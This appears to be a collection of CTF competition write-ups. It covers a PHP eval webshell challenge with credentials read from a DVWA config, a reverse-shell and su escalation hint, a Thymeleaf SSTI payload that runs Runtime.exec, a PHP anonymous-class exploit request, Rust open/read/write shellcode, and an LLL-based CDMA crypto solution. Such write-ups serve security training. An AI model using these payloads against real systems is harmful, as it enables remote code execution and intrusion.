Recruitment notice: the CTF group is looking for players in re, crypto, pwn, misc and smart contracts, and the IoT, Car, ICS and sample-analysis groups are hiring on an ongoing basis. If interested, email admin@chamd5.org with your résumé and the group you want to join.
<?php
if (!isset($_SERVER['PHP_AUTH_USER'])) {
    header('WWW-Authenticate: Basic realm="Restricted Area"');
    header('HTTP/1.0 401 Unauthorized');
    echo '小明是运维工程师,最近网站老是出现bug。'; // "Xiao Ming is an ops engineer; lately the site keeps having bugs."
    exit;
} else {
    $validUser = 'admin';
    $validPass = '2e525e29e465f45d8d7c56319fe73036';
    if ($_SERVER['PHP_AUTH_USER'] != $validUser || $_SERVER['PHP_AUTH_PW'] != $validPass) {
        header('WWW-Authenticate: Basic realm="Restricted Area"');
        header('HTTP/1.0 401 Unauthorized');
        echo 'Invalid credentials';
        exit;
    }
}
@eval($_GET['cmd']);
highlight_file(__FILE__);
?>
The flag is in the root directory; privilege escalation is needed.
Array ( [0] => . [1] => .. [2] => config.inc.php [3] => index.php [4] => www.zip )
<?php

# If you are having problems connecting to the MySQL database and all of the variables below are correct
# try changing the 'db_server' variable from localhost to 127.0.0.1. Fixes a problem due to sockets.
# Thanks to @digininja for the fix.

# Database management system to use
$DBMS = 'MySQL';
#$DBMS = 'PGSQL'; // Currently disabled

# Database variables
#   WARNING: The database specified under db_database WILL BE ENTIRELY DELETED during setup.
#   Please use a database dedicated to DVWA.
#
# If you are using MariaDB then you cannot use root, you must create a dedicated DVWA user.
#   See README.md for more information on this.
$_DVWA = array();
$_DVWA[ 'db_server' ]   = '127.0.0.1';
$_DVWA[ 'db_database' ] = 'dvwa';
$_DVWA[ 'db_user' ]     = 'root';
$_DVWA[ 'db_password' ] = 'b90e0086d8b1165403de6974c4167165';

# Only used with PostgreSQL/PGSQL database selection.
$_DVWA[ 'db_port '] = '5432';

# ReCAPTCHA settings
#   Used for the 'Insecure CAPTCHA' module
#   You'll need to generate your own keys at: https://www.google.com/recaptcha/admin
$_DVWA[ 'recaptcha_public_key' ]  = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg';
$_DVWA[ 'recaptcha_private_key' ] = '6LdK7xITAzzAAL_uw9YXVUOPoIHPZLfw2K1n5NVQ';

# Default security level
#   Default value for the security level with each session.
#   The default is 'impossible'. You may wish to set this to either 'low', 'medium', 'high' or 'impossible'.
$_DVWA[ 'default_security_level' ] = 'impossible';

# Default PHPIDS status
#   PHPIDS status with each session.
#   The default is 'disabled'. You can set this to be either 'enabled' or 'disabled'.
$_DVWA[ 'default_phpids_level' ] = 'disabled';

# Verbose PHPIDS messages
#   Enabling this will show why the WAF blocked the request on the blocked request.
#   The default is 'disabled'. You can set this to be either 'true' or 'false'.
$_DVWA[ 'default_phpids_verbose' ] = 'false';

?>
Use pcntl_exec to get a reverse shell, then su with the password we read from the config to escalate privileges.
easyescape - post-competition reproduction
TTL is set to 0, and there is a 4 s gap between the DNS resolution and the actual request.
I thought it was DNS rebinding, but it didn't work when I tested it. Looking at it again today, there really are two requests, so a DNS rebinding attack is possible, but I couldn't get it to work either locally or remotely. A 302 redirect can be used to bypass it.
The internal service is a Thymeleaf SSTI with outbound network access, so it gives a shell directly.
Context context = new Context();
SpringTemplateEngine engine = new SpringTemplateEngine();
return engine.process(hostname, (IContext) context);
Use this as the hostname:
[[${T(java.lang.Boolean).forName("com.fasterxml.jackson.databind.ObjectMapper").newInstance().readValue("{}",T(java.lang.Boolean).forName("org.springframework.expression.spel.standard.SpelExpressionParser")).parseExpression("T(Runtime).getRuntime().exec('calc')").getValue()}]]
https://github.com/synacktiv/php_filter_chains_oracle_exploit
Error-based oracle side-channel attack
The tool sometimes manages to dump part of the content; after passing the parameter as below, the source is highlighted:
/flag.php?ezphpPhp8=ko1sh1
<?php
if (isset($_GET['ezphpPhp8'])) {
    highlight_file(__FILE__);
} else {
    die("No");
}
$a = new class {
    function __construct() { }
    function getflag() {
        system('cat /flag');
    }
};
unset($a);
$a = $_GET['ezphpPhp8'];
$f = new $a();
$f->getflag();
GET /flag.php?ezphpPhp8=class@anonymous%00/var/www/html/flag.php:7$0 HTTP/1.1
Host: eci-2zef6aoe4x8c78fobzdc.cloudeci1.ichunqiu.com
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="107", "Chromium";v="107", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1711431296,1711937711,1712027510
When std is banned, write a Rust program to do the work.
Use orw (open/read/write) to get the flag; the syscalls can be issued from inline assembly (a Rust orw shellcode):
fn main() {
    let mut buf = [0u8; 1024];
    let filename = "/flag\0"; // NUL-terminated so the kernel sees a proper C string
    let fd: i32;
    let count: usize;
    unsafe {
        // open syscall
        core::arch::asm!(
            "syscall",
            in("rax") 2, // sys_open
            in("rdi") filename.as_ptr(),
            in("rsi") 0, // flags (O_RDONLY)
            lateout("rax") fd,
            out("rcx") _, out("r11") _, // clobbered by the syscall instruction
        );
        // check that the file descriptor is valid
        if fd >= 0 {
            // read syscall
            core::arch::asm!(
                "syscall",
                in("rax") 0, // sys_read
                in("rdi") fd,
                in("rsi") buf.as_mut_ptr(),
                in("rdx") buf.len(),
                lateout("rax") count,
                out("rcx") _, out("r11") _,
            );
            // write syscall: write what was read to stdout
            core::arch::asm!(
                "syscall",
                in("rax") 1, // sys_write
                in("rdi") 1, // stdout
                in("rsi") buf.as_ptr(),
                in("rdx") count,
                lateout("rax") _,
                out("rcx") _, out("r11") _,
            );
        }
    }
}
The given signal contains Gaussian noise, so denoise first by taking the mean.
The whole algorithm can then be viewed as
But this is not exactly a matrix multiplication mod 2: inside the inner product, adding element to element is XOR (addition mod 2), while the final summation is a plain integer sum. However, XOR on {0, 1} and multiplication on {1, -1} correspond one-to-one,
so the operation above can also be mapped to an ordinary matrix multiplication (the signs probably need to be flipped).
So S can be seen as a linear transformation of chips, and chips contains only 1 and -1, so just run LLL on S directly.
After obtaining chips,
by the orthogonality of the CDMA codes after this transformation,
we compute
and obtain
In this way the flag goes from a column vector to a row vector. But since 1 and -1 are used here while the challenge's basis is 0 and 1, the result is not a multiple of 32; in practice, though, it is not complicated: there are only two possible values.
import pickle  # run under SageMath: matrix() and ZZ are Sage builtins

with open("output.pkl", "rb") as file:
    signal = pickle.load(file)

single_signal_list = []
signals = []
signals_col = []
for i in range(0, len(signal) // 1997):
    # each chip value is spread over 1997 noisy samples: average them back to one value
    single_signal_list = signal[i*1997:(i+1)*1997]
    single_signal = round((sum(single_signal_list) / 1997) * 10)
    signals.append(single_signal)
    if len(signals) == 32:
        # every 32 chip values form one row of S
        signals_col.append(signals)
        signals = []

signals_matrix = matrix(ZZ, signals_col)
chips = signals_matrix.LLL()[-11:-1]
M_T = chips * signals_matrix.T
for m in M_T:
    tag = m[0]
    flag = ''.join(['0' if i == tag else '1' for i in m])
    print(int.to_bytes(int(flag, 2), 48, 'big'))  # byteorder assumed 'big'; the original line was cut off here
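As an added illustration (not the writeup's own code): a constructed pure-Python CDMA model that spreads one user's bits with orthogonal ±1 Walsh codes alongside nine random users, stretches every chip over 1997 noisy samples as in the challenge, averages each window to denoise, and then despreads by correlation, taking the first value as the '0' reference the way the writeup does so that a sign-flipped code still decodes. The codes, message, noise level and number of users are assumptions; the challenge's real chips were recovered with LLL, which this example does not reproduce.

```python
import random

CHIP_LEN = 32            # chips per bit: the writeup's 32-wide rows
SAMPLES_PER_CHIP = 1997  # noisy samples per chip value: the writeup's 1997-sample windows
N_USERS = 10             # spreading codes in use (assumption, matching the ten chips kept above)

def walsh_codes(n):
    """Sylvester-Hadamard rows: n mutually orthogonal +-1 codes of length n (n a power of two)."""
    h = [[1]]
    while len(h) < n:
        h = [r + r for r in h] + [r + [-x for x in r] for r in h]
    return h

def spread(bitstreams, codes):
    """CDMA encode: bit 0/1 -> -1/+1, times the user's code, summed over users; one row per bit."""
    rows = []
    for i in range(len(bitstreams[0])):
        row = [0] * len(codes[0])
        for bits, code in zip(bitstreams, codes):
            b = 1 if bits[i] == "1" else -1
            row = [r + b * c for r, c in zip(row, code)]
        rows.append(row)
    return rows

def transmit(rows, sigma, rng):
    """Constructed channel: repeat each chip value SAMPLES_PER_CHIP times and add Gaussian noise."""
    return [v + rng.gauss(0, sigma) for row in rows for v in row for _ in range(SAMPLES_PER_CHIP)]

def denoise(samples):
    """Average each window back to one integer chip value and regroup into CHIP_LEN-wide rows."""
    vals = [round(sum(samples[i:i + SAMPLES_PER_CHIP]) / SAMPLES_PER_CHIP)
            for i in range(0, len(samples), SAMPLES_PER_CHIP)]
    return [vals[i:i + CHIP_LEN] for i in range(0, len(vals), CHIP_LEN)]

def despread(rows, code):
    """Correlate every row with one code: orthogonality cancels the other users, leaving +-len(code).
    The first value is the '0' reference (the writeup's tag), so a sign-flipped code still decodes
    as long as the first plaintext bit is 0, which holds for ASCII."""
    corr = [sum(r * c for r, c in zip(row, code)) for row in rows]
    return "".join("0" if (v > 0) == (corr[0] > 0) else "1" for v in corr)

def bits_of(data):
    return "".join(f"{b:08b}" for b in data)

def recover(message=b"cdma", sigma=3.0, seed=1):
    """End to end: user 0 carries `message`, the other users random bits; decode user 0's bytes."""
    rng = random.Random(seed)
    codes = walsh_codes(CHIP_LEN)[:N_USERS]
    streams = [bits_of(message)] + ["".join(rng.choice("01") for _ in range(8 * len(message)))
                                    for _ in range(N_USERS - 1)]
    rows = denoise(transmit(spread(streams, codes), sigma, rng))
    bits = despread(rows, [-c for c in codes[0]])  # deliberately sign-flipped, as LLL may return it
    return int(bits, 2).to_bytes(len(message), "big")
```

With the sign-flipped code the raw correlations come out as -32 for a 1 bit and +32 for a 0 bit, which is exactly the "two possible values" the writeup resolves through the tag comparison.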
Don't use Google for this one, use Bing.